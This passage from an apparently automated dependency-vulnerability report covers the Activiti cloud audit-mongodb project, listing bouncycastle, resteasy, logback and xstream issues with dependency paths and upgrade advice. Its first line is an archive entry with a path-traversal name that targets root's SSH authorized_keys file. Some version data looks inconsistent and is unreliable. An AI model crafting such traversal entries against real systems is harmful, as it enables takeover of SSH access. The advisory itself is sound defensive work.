2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys
Remediation
Upgrade commons-io:commons-io to version 2.7 or higher.
References
medium severity
- Vulnerable module: org.bouncycastle:bcprov-jdk15on
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.keycloak:keycloak-jetty-core@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.keycloak:keycloak-jetty-core@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
Overview
org.bouncycastle:bcprov-jdk15on is a Java implementation of cryptographic algorithms.
Affected versions of this package are vulnerable to Timing Attack. A timing issue within the EC math library can expose information about the private key when an attacker is able to observe timing information for the generation of multiple deterministic ECDSA signatures.
Remediation
Upgrade org.bouncycastle:bcprov-jdk15on to version 1.66 or higher.
References
medium severity
- Vulnerable module: org.jboss.resteasy:resteasy-client
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.jboss.resteasy:resteasy-client@3.0.21.Final
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.jboss.resteasy:resteasy-client@3.0.21.Final
Overview
org.jboss.resteasy:resteasy-client is a RESTEasy JAX-RS Client
Affected versions of this package are vulnerable to Information Exposure. It may allow client users to obtain the server's potentially sensitive information when the server got WebApplicationException from the RESTEasy client call.
Remediation
Upgrade org.jboss.resteasy:resteasy-client to version 4.5.8.SP1 or higher.
References
medium severity
- Vulnerable module: ch.qos.logback:logback-core
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-logging@7-201802-EA › net.logstash.logback:logstash-logback-encoder@4.11 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-amqp@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-jetty@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-security@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-monitoring@7-201802-EA › org.springframework.boot:spring-boot-starter-actuator@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-jetty@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-jetty@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-security@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-web@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-web@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-tracing@7-201802-EA › org.springframework.cloud:spring-cloud-starter-sleuth@3.1.11 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.boot:spring-boot-starter-cache@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-stream@5.0.0 › org.springframework.boot:spring-boot-starter-validation@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-monitoring@7-201802-EA › org.springframework.boot:spring-boot-starter-actuator@4.0.1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-tracing@7-201802-EA › org.springframework.cloud:spring-cloud-starter-sleuth@3.1.11 › org.springframework.boot:spring-boot-starter-aop@4.0.0-M2 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-web@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.boot:spring-boot-starter-cache@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.boot:spring-boot-starter-amqp@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-amqp@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream@5.0.0 › org.springframework.boot:spring-boot-starter-validation@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.cloud:spring-cloud-stream@5.0.0 › org.springframework.boot:spring-boot-starter-validation@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
Overview
ch.qos.logback:logback-core is a logback-core module.
Affected versions of this package are vulnerable to Insufficient Hostname Verification. X.509 are not properly validated. By spoofing the TLS/SSL server via a certificate that appears valid, an attacker with the ability to intercept network traffic (e.g. MitM, DNS cache poisoning) can disclose and optionally manipulate transmitted data.
Remediation
Upgrade ch.qos.logback:logback-core to version 1.2.7 or higher.
References
medium severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
